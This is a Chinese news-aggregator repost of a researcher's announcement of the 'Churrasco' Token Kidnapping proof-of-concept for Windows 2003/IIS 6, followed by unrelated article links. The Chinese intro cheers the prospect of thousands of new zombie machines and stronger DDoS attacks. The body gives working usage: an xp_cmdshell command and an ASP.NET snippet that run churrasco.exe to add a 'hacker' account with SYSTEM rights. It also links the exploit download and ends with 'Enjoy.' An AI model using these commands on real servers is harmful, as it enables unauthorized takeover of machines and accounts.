当前位置: 首页 > news >正文

iis6+asp.net服务器致命漏洞

news 来源:原创 2024/5/3 1:07:27

前天同事发现了这个漏洞,今天我又在朋友的空间测试了下,确实可以运行一切命令,

至今为止,MS没有出补丁,估计中国又增加成千上万的肉鸡了。DDOS又要更猛了.

It has been a long time since Token Kidnapping presentation (http://
www.argeniss.com/research/TokenKidnapping.pdf) was published so I
decided to release a PoC exploit for Win2k3 that alows to execute code
under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can
own Windows, this is because Windows services accounts can
impersonate.
Other process (not services) that can impersonate are IIS 6 worker
processes so if you can run code from an ASP .NET or classic ASP web
application then you can own Windows too. If you provide shared
hosting services then I would recomend to not allow users to run this
kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want
to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.

RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

Enjoy.
 Posted by Cesar Cerrudo at 4:10 PM

相关文章:

  • [转]mysql临时表功能
  • 关于URL欺骗所想到的
  • logadm 配置
  • HSRP实验配置
  • 为ASP.NET MVC扩展异步Action功能(下)
  • 谏太宗十思疏 魏征(原文/译文)
  • Google协作平台中文版BUG两条
  • Delphi调用.net的WebService和Delphi对XML文件的相关处理(1)
  • 资料链接整理
  • 设计之道
  • WINXP终极瘦身、优化、封装全攻略 万能WinXP Ghost镜像制作指南
  • 【转】中小IT企业如何留住80后技术人才
  • ASP.net:未能加载文件或程序集
  • 钱的能量转换守恒定律
  • 网络存储设备磁带机术语解释
  • 时间复杂度分析经典问题——最大子序列和
  • 【挥舞JS】JS实现继承,封装一个extends方法
  • JWT究竟是什么呢?
  • MySQL主从复制读写分离及奇怪的问题
  • Netty 4.1 源代码学习:线程模型
  • python3 使用 asyncio 代替线程
  • vue2.0开发聊天程序(四) 完整体验一次Vue开发(下)
  • 力扣(LeetCode)21
  • 普通函数和构造函数的区别
  • 入口文件开始,分析Vue源码实现
  • 设计模式(12)迭代器模式(讲解+应用)
  • 云栖大讲堂Java基础入门(三)- 阿里巴巴Java开发手册介绍
  • Java数据解析之JSON
  • Linux权限管理(week1_day5)--技术流ken
  • PostgreSQL之连接数修改
  • 完善智慧办公建设,小熊U租获京东数千万元A+轮融资 ...
  • ​​​​​​​sokit v1.3抓手机应用socket数据包: Socket是传输控制层协议,WebSocket是应用层协议。
  • ​2020 年大前端技术趋势解读
  • ​马来语翻译中文去哪比较好?
  • #### go map 底层结构 ####
  • #我与Java虚拟机的故事#连载03:面试过的百度,滴滴,快手都问了这些问题
  • (2)关于RabbitMq 的 Topic Exchange 主题交换机
  • (32位汇编 五)mov/add/sub/and/or/xor/not
  • (C++17) std算法之执行策略 execution
  • (阿里巴巴 dubbo,有数据库,可执行 )dubbo zookeeper spring demo
  • (搬运以学习)flask 上下文的实现
  • (顶刊)一个基于分类代理模型的超多目标优化算法
  • (二)丶RabbitMQ的六大核心
  • (非本人原创)我们工作到底是为了什么?​——HP大中华区总裁孙振耀退休感言(r4笔记第60天)...
  • (论文阅读31/100)Stacked hourglass networks for human pose estimation
  • (深入.Net平台的软件系统分层开发).第一章.上机练习.20170424
  • (十)c52学习之旅-定时器实验
  • (一)认识微服务
  • (转)mysql使用Navicat 导出和导入数据库
  • (转载)PyTorch代码规范最佳实践和样式指南
  • .bat批处理(十):从路径字符串中截取盘符、文件名、后缀名等信息
  • .cn根服务器被攻击之后
  • .net 按比例显示图片的缩略图
  • .NET 的静态构造函数是否线程安全?答案是肯定的!
  • .Net6 Api Swagger配置